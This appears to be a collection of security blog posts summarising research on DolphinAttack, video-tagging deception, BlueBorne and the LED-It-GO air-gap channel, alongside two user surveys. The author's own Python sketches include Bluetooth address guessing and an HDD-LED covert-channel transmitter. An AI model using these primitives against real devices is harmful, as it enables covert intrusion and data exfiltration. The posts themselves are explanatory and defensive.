DolphinAttack or How To Stealthily Fool Voice Assistants

Six researchers from Zhejiang University published an excellent paper describing DolphinAttack: a new attack against voice-based assistants such as Siri or Alexa. As usual, the objective is to force the assistant to accept a command that the owner of the assistant did not issue. The attack is more powerful if the owner does not detect its occurrence (except, of course, for the potential consequences of the accepted command). Ideally, the owner hears no recognizable command, or, even better, nothing at all.

Many attacks try to fool the speech recognition system itself, crafting inputs that mislead the underlying machine learning model without using actual phonemes. The proposed approach is different. The objective is to fool the audio acquisition system rather than the speech recognition.

Humans do not hear ultrasound, i.e., frequencies greater than 20 kHz. Speech usually lies in the range of a few hundred Hz up to 5 kHz. The researchers' great idea is to exploit the characteristics of the acquisition system:

  1. The acquisition system consists of a microphone, an amplifier, a low-pass filter (LPF), and an analog-to-digital converter (ADC), regardless of the speech recognition system in use. The LPF filters out the frequencies above 20 kHz, and the ADC samples at 44.1 kHz.
  2. Any electronic system creates harmonics due to non-linearity. Thus, if you modulate a signal of frequency fm with a carrier at fc, many harmonics appear in the Fourier domain, such as fc - fm, fc + fm, and fc, as well as their multiples.

You may have guessed the trick. If the attacker amplitude-modulates the command (fm) onto an ultrasonic carrier fc, the resulting signal is inaudible. The non-linearity of the microphone and amplifier recreates a baseband copy of the command, and the LPF removes the carrier and its high-frequency products before the signal reaches the ADC. The residual command is therefore present in the filtered signal and may be understood by the speech recognition system. Of course, a real command is more complex than a single frequency, but the principle still holds.
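Here is a minimal simulation of the principle (my own sketch, not the researchers' code), assuming numpy and scipy are available; a 1 kHz tone stands in for the voice command and all numeric values are illustrative:

    # Amplitude-modulate a "command" onto an inaudible 25 kHz carrier, let a
    # slightly non-linear microphone demodulate it, then low-pass filter below 20 kHz.
    import numpy as np
    from scipy.signal import butter, filtfilt

    fs = 192_000                                   # simulation sampling rate (Hz)
    t = np.arange(0, 0.1, 1 / fs)
    fm, fc = 1_000, 25_000                         # "command" tone and ultrasonic carrier (Hz)

    command = np.cos(2 * np.pi * fm * t)
    emitted = (1 + 0.5 * command) * np.cos(2 * np.pi * fc * t)   # inaudible AM signal

    # A real microphone/amplifier is slightly non-linear; the quadratic term
    # recreates a baseband copy of the command.
    captured = emitted + 0.1 * emitted ** 2

    # The acquisition chain's LPF (cut-off around 20 kHz) removes the carrier and
    # its harmonics; what reaches the ADC is essentially the recovered command.
    b, a = butter(6, 20_000 / (fs / 2))
    recovered = filtfilt(b, a, captured)

    print("correlation with the original command:",
          round(float(np.corrcoef(command, recovered)[0, 1]), 2))

The recovered signal correlates almost perfectly with the original tone, and that is exactly what the speech recognizer receives.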

They modulated the amplitude of a carrier with a vocal command. The carrier was in the range 20 kHz to 25 kHz. They experimented with many hardware platforms and speech recognition systems. As we may guess, the attack is highly hardware dependent. There is an optimal carrier frequency that is device dependent (due to the various microphones). Nevertheless, with the right parameters for a given device, they seem to have fooled most devices. Of course, the optimal setup requires an ultrasonic speaker and a suitable amplifier; ordinary speakers usually have a response curve that cuts off before 20 kHz.

I love this attack because it thinks outside the box and exploits "characteristics" of the hardware. It is also a good illustration of Law N°6: Security is not stronger than its weakest link.

A good paper to read.

 

Zhang, Guoming, Chen Yan, Xiaoyu Ji, Taimin Zhang, Tianchen Zhang, and Wenyuan Xu. “DolphinAttack: Inaudible Voice Commands.” In ArXiv:1708.09537 [Cs], 103–17. Dallas, Texas, USA: ACM, 2017. http://arxiv.org/abs/1708.09537

 

Picture by http://maxpixel.freegreatpicture.com/Dolphin-Fish-Animal-Sea-Water-Ocean-Mammal-41436

Subliminal images deceive Machine Learning video labeling

Current machine learning systems are not designed to defend against malevolent adversaries. Some teams have already succeeded in fooling image recognition or voice recognition. Three researchers from the University of Washington fooled Google's video tagging system. Google offers a Cloud Video Intelligence API that returns the most relevant tags for a video sequence. It is based on deep learning.

The researchers' idea is simple. They insert the same image every 50 frames in the video. The API returns the tags related to the inserted image (with over 90% confidence) rather than the tags describing the actual video content. Thus, rather than returning "tiger" for a video that shows a tiger 98% of the time, the API returns "Audi."
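A rough sketch of the manipulation (my illustration, not the researchers' code), assuming OpenCV is available and using placeholder file names:

    # Overwrite one frame out of every 50 with an adversarial image.
    import cv2

    cap = cv2.VideoCapture("tiger.mp4")                  # placeholder input video
    fps = cap.get(cv2.CAP_PROP_FPS)
    width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
    height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))

    inserted = cv2.resize(cv2.imread("audi.jpg"), (width, height))   # placeholder image

    out = cv2.VideoWriter("forged.mp4", cv2.VideoWriter_fourcc(*"mp4v"),
                          fps, (width, height))
    index = 0
    while True:
        ok, frame = cap.read()
        if not ok:
            break
        out.write(inserted if index % 50 == 0 else frame)
        index += 1

    cap.release()
    out.release()

Only one frame in fifty is altered, yet the returned tags describe the inserted image.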

It has never been demonstrated that subliminal images are effective on people. This team demonstrated that subliminal images can be effective on Machine Learning. This attack has many interesting uses.

This short paper is interesting to read. Testing this attack on other APIs would be interesting.

Hosseini, Hossein, Baicen Xiao, and Radha Poovendran. “Deceiving Google’s Cloud Video Intelligence API Built for Summarizing Videos.” arXiv, March 31, 2017. https://arxiv.org/abs/1703.09793

BlueBorne

Ben Seri and Gregory Vishnepolsky from the company Armis recently disclosed eight vulnerabilities present in various Bluetooth stacks. Their paper “The dangers of Bluetooth implementations: Unveiling zero day vulnerabilities and security flaws in modern Bluetooth stacks” thoroughly describes these vulnerabilities and derives some interesting lessons.

Some vulnerabilities may allow taking control of the Bluetooth device. These exploits do not need the target to be in discoverable mode. They just need the Bluetooth MAC address (BDADDR). Contrary to common belief, it is guessable even for non-discoverable devices. If the target generates Bluetooth traffic, then its BDADDR is visible in the access code. If it is not generating traffic, the widely followed convention of using the same MAC address for Wi-Fi as for Bluetooth may reveal it.
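To illustrate the second case (my sketch, not part of the paper; the report only mentions reuse of the same address, so the +/-1 offsets are an assumption about common vendor practice), enumerating candidate BDADDRs from a sniffed Wi-Fi MAC is trivial:

    # Derive candidate Bluetooth addresses from a device's Wi-Fi MAC address.
    def candidate_bdaddrs(wifi_mac: str) -> list[str]:
        value = int(wifi_mac.replace(":", ""), 16)
        candidates = []
        for offset in (0, 1, -1):          # same address, plus assumed +/-1 variants
            cand = (value + offset) & 0xFFFFFFFFFFFF
            candidates.append(":".join(f"{(cand >> s) & 0xFF:02X}" for s in range(40, -1, -8)))
        return candidates

    print(candidate_bdaddrs("AC:DE:48:12:34:56"))   # placeholder Wi-Fi MAC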

Once the attacker knows the BDADDR, they can use the exploits. One powerful vulnerability is due to the lack of implementation guidelines in the specification of the “Just Works” authentication. For Android and Windows, if the attacker claims to be “No Input No Output, no man-in-the-middle protection required, and no bonding,” the target stealthily accepts the connection with limited security capabilities for a short period of time (due to the absence of bonding). Of course, any service that requires MitM protection or bonding, and verifies this requirement, will refuse to operate over such a connection. On Apple devices, the connection requires validation by the user.
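The fallback logic can be sketched as follows (a deliberate simplification of the Secure Simple Pairing rules, not code from the paper; the real IO-capability matrix in the Bluetooth specification is richer):

    # Simplified decision of the pairing association model.
    def association_model(local_io, remote_io, local_mitm_required, remote_mitm_required):
        # If neither side asks for man-in-the-middle protection, Just Works is used.
        if not (local_mitm_required or remote_mitm_required):
            return "Just Works"
        # A device declaring "NoInputNoOutput" cannot display or confirm a code,
        # so the pairing also degrades to Just Works, without MITM protection.
        if "NoInputNoOutput" in (local_io, remote_io):
            return "Just Works"
        return "Numeric Comparison / Passkey Entry"

    # An attacker advertising NoInputNoOutput and requesting no MITM protection
    # obtains an unauthenticated link without any user interaction:
    print(association_model("NoInputNoOutput", "DisplayYesNo", False, False))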

Once the attacker is linked to the unsuspecting target, they can try many attacks. My preferred ones are CVE-2017-0783 and CVE-2017-8628. They use a flaw in the specification of the Personal Area Network (PAN) profile. This service has a low security requirement level. This means that the previous attack grants access to the PAN without any authorization! The attacker can mount a pineapple attack over Bluetooth without the target being aware. With a Wi-Fi Pineapple, the attacker impersonates an already known public Wi-Fi network and can act as a man in the middle. In this case, the pineapple does not even need to be a known network. Formidable.

The PAN specification dates from 2003 and has never been revised since. “Just Works” and the newer authentication protocols were specified more recently. They changed the trust model and trust context. The older specifications were never re-analyzed to identify the potential impacts.

The other vulnerabilities allow either buffer overflows or data leakage by reading beyond the allocated memory spaces.

The disclosure was part of a coordinated disclosure with Google, Microsoft, and Linux kernel team.

Conclusion: verify that you installed the August and September security patches on your devices. They contain fixes for these vulnerabilities.

 

French users seem aware of the risks and threats of illicit sites

The French HADOPI recently published an interesting paper, “Etude sur les risques encourus sur les sites illicites,” i.e., a study on the risks incurred on illicit sites. They polled 1,021 Internet users older than 15. The first part of the study analyses the reported use of so-called illicit sites. The second part assesses these users’ awareness of the associated risks.

The first part is very conventional and shows information that was already known for other markets. The results are neither surprising nor do they deviate widely from those of other countries. For instance, unsurprisingly, the younger generations use illicit sharing sites more than the older ones.

Figure extracted from the report. In black, my proposed translation.

Music, movies, and TV shows are the most illicitly accessed categories.

The second part is more interesting than the first one. Most polled users claim to know the threats of the Internet (scareware, spam, computer slowdown due to malware, adult advertising, and changes to the browser’s settings) as well as the more serious harms (theft of banking credentials, identity theft, scams, or ransomware). Nevertheless, the more one consumes illicit content, the higher the risk of nuisance and harm. Not surprisingly, 60% of consumers who stopped using illicit content had suffered at least one serious harm.

Figure extracted from the report. In black, my proposed translation.

Users seem to understand that consuming illicit content seriously increases the risks. Nevertheless, there is a distortion: nuisances are more readily associated with illicit consumption than actual harms are.

Figure extracted from the report. In black, my proposed translation.

The top four motivations of legal users are being lawful (66%), fear of malware (51%), respect for the artists (50%), and a better product (43%). For regular illicit users, the top three motivations for using the legal offer are better quality (43%), fear of malware (42%), and being lawful (41%). 57% of illicit users claim that they intend to reduce or stop using illegal content. 39% of illicit users state that they will not change their behavior. 4% of illicit users claim they plan to consume more illicit content.

We must always be cautious with the answers to a poll. Some people may not be ready to disclose their unlawful behavior. Therefore, the real levels of illicit behavior are most probably higher than reported in the document. Polled people may also give wrong answers. For instance, about 30% of the consumers who illicitly obtain software claim to use streaming! Caution should also apply to the distinction between streaming and P2P. Many newer tools, for instance Popcorn Time, use P2P but present a behavior similar to streaming.

Conclusion of the report

Risks are present on the Internet. Illicit users are more at risk than lawful users.

Users acknowledge that illicit consumption is riskier than legal consumption.

Legal offer is perceived as the safe choice.

Having been hit by a security problem pushes users towards the legal offer.

An interesting report; unfortunately, it is currently only available in French.

What the Public Knows About Cybersecurity

In June 2016, the US Pew Research Center asked 1,055 US adults 13 questions to evaluate their knowledge of cybersecurity. The questions ranged from identifying a suitable password to identifying a two-factor authentication system.

The readers of this blog would belong to the 1% of the sample (i.e., 11 individuals) who made no mistake. To be honest, non-US readers might fail the question related to the US credit score (“Americans can legally obtain one free credit report yearly from each of the three credit bureaus.”). This question is not directly related to cybersecurity and is purely US-specific. I must confess that before moving to the US, I would have had no idea of the right answer.

Not surprisingly, the success ratio was low. The average number of correct answers was 5.5 out of the 13 questions asked! Three-quarters of interviewees correctly identified a strong password. About half of the individuals accurately spotted a simple phishing attack. Only one-third knew that HTTPS means the connection is encrypted.

There was a clear correlation between the level of education and the proportion of correct answers. Those with college degrees or higher had an average of 7 right answers. The impact of age was less conclusive.

You may take the quiz.

Lessons:

The results are not a surprise. We do not see an increase in awareness. This study should be a reminder that we, the security practitioners, must educate the people around us. It is our civic responsibility and duty. This education is the first step towards a more secure connected world. Without it, the connected world will become hell for most people.

The paper may be useful in your library.

Ref:

Olmstead, Kenneth, and Aaron Smith. “What the Public Knows About Cybersecurity,” March 22, 2017. http://assets.pewresearch.org/wp-content/uploads/sites/14/2017/03/17140820/PI_2017.03.22_Cybersecurity-Quiz_FINAL.pdf

Malware Lets a Drone Steal Data by Watching a Computer’s Blinking LED

This news, initially published by Wired, made the headlines of many news outlets and blogs. Thus, I had to dive in and read the paper. This team has already disclosed other covert channels in the past, such as temperature. Three researchers, Guri M., Zadov B., and Elovici Y., have devised a new way to breach an air gap. They use the hard-drive (HDD) activity LED as a covert channel. By reading from the hard drive in a given sequence, it is possible to control the LED without being a privileged user. The reading sequence modulates the emitted light, which carries the covert message.

They experimented with several ordinary computers and concluded that they were able to reach about 4 kbit/s by reading 4 KB sectors. Obviously, such throughput requires special equipment to record the blinking LED. Typical video cameras will not capture more than about 15 bit/s, depending on their frames per second (fps): remember the Nyquist-Shannon sampling theorem, a 30 fps camera cannot reliably sample a signal faster than 15 Hz. Thus, they used a photodiode or specialized amplified light detectors. Only such equipment can guarantee a good detection rate.
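The transmitter side can be sketched in a few lines (my illustration, not the paper's code; the device path, timings, and the use of random read offsets to sidestep the page cache, where the paper instead drops the caches, are all assumptions):

    # On-off keying over the HDD activity LED: a burst of reads lights the LED ("1"),
    # an idle period leaves it dark ("0"). Reading the raw device requires root.
    import os
    import random
    import time

    DEVICE = "/dev/sda"                     # placeholder block device
    CHUNK = 4096                            # 4 KB reads, as in the paper
    BIT_PERIOD = 0.01                       # 10 ms per bit, i.e. roughly 100 bit/s
    SPAN = 8 * 1024 ** 3                    # spread reads over the first 8 GB

    def send_bit(bit, fd):
        deadline = time.monotonic() + BIT_PERIOD
        if bit:
            while time.monotonic() < deadline:          # keep the disk busy: LED on
                offset = random.randrange(0, SPAN // CHUNK) * CHUNK
                os.pread(fd, CHUNK, offset)
            return
        time.sleep(BIT_PERIOD)                          # stay idle: LED off

    fd = os.open(DEVICE, os.O_RDONLY)
    for bit in (1, 0, 1, 1, 0, 0, 1, 0):                # the covert payload
        send_bit(bit, fd)
    os.close(fd)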

Using HDD activity as a covert channel is not a new method. At Black Hat 2008, Filiol E. et al. disclosed such an attack, but they used the clicking of the HDD, i.e., an acoustic channel, rather than the LED, i.e., an optical channel. Their presentation covers many interesting covert channels.

The new attack is nice, and adding the drone component guarantees the buzz. Nevertheless, I believe it is not as dangerous as publicized. The issue is the malware itself. The malware has to be the only entity accessing the HDD during the transmission. Indeed, if any concurrent process uses the HDD, it will interfere with the emitted message. Therefore, the researchers recommend turning off disk caching (drop_caches on Linux). What is the likelihood that an air-gapped computer runs the malware as the exclusive disk-accessing process without it being noticed? The malware must be stealthy, and thus is unlikely to be alone in accessing the HDD.

The second issue is the synchronization with the spying eyes. The evil maid (or evil drone) scenario does not seem realistic. The malware should execute only while the spy is present; otherwise it will be noticed (due to the exclusive access to the HDD). The spy cannot signal their presence to the malware, as the malware is air-gapped and thus cannot receive any incoming message. Thus, either they have to agree in advance on some rendezvous, or the malware has to run repeatedly for long periods, reducing its stealthiness. If the spying device is “fixed,” using cameras is not realistic due to their low bandwidth, which again requires the malware to run for long periods. Nevertheless, the spy may install special equipment that records everything and later analyze the recorded light, looking for the malware’s sequences whenever the malware wakes up and plays. The spying device will then have to stealthily exfiltrate a far larger recording than the covert message itself, increasing the risk of being detected.

The attack is possible but seems more complex than publicized. The countermeasures proposed in the paper already give away the defense:

Another interesting solution is to execute a background process that frequently invokes random read and write operations; that way, the signal generated by the malicious process will get mixed up with a random noise, limiting the attack’s effectiveness.
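A minimal approximation of that masking process (my sketch, not the paper's code; the scratch file name, sizes, and timings are assumptions):

    # Background noise generator: keep issuing random reads and writes so that
    # any LED-encoded signal is drowned in unrelated disk activity.
    import os
    import random
    import time

    SCRATCH = "/var/tmp/led_noise.bin"      # placeholder scratch file
    SIZE = 64 * 1024 * 1024                 # 64 MB

    with open(SCRATCH, "wb") as f:          # create the scratch file once
        f.write(os.urandom(SIZE))

    while True:
        with open(SCRATCH, "r+b") as f:
            f.seek(random.randrange(0, SIZE - 4096))
            if random.random() < 0.5:
                f.read(4096)                            # random read
            else:
                f.write(os.urandom(4096))               # random write
                f.flush()
                os.fsync(f.fileno())                    # force it onto the disk
        time.sleep(random.uniform(0.0, 0.05))           # jitter the disk activity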

As already noted, I believe that in most cases more than one process will be running and accessing the HDD. If you are paranoid, you can always hide the LED.

Reference:

Guri, Mordechai, Boris Zadov, and Yuval Elovici. “LED-It-GO Leaking a Lot of Data from Air-Gapped Computers via the (Small) Hard Drive LED,” February 2017. http://cyber.bgu.ac.il/advanced-cyber/system/files/LED-it-GO_0.pdf

Calmette, Vincent, Stephane Vallet, Eric Filiol, and Guy Le Bouter. “Passive and Active Leakage of Secret Data from Non Networked Computer.” Black Hat 2008, Las Vegas, NV, USA, 2008. https://www.researchgate.net/publication/228801499_Passive_and_Active_Leakage_of_Secret_Data_from_Non_Networked_Computer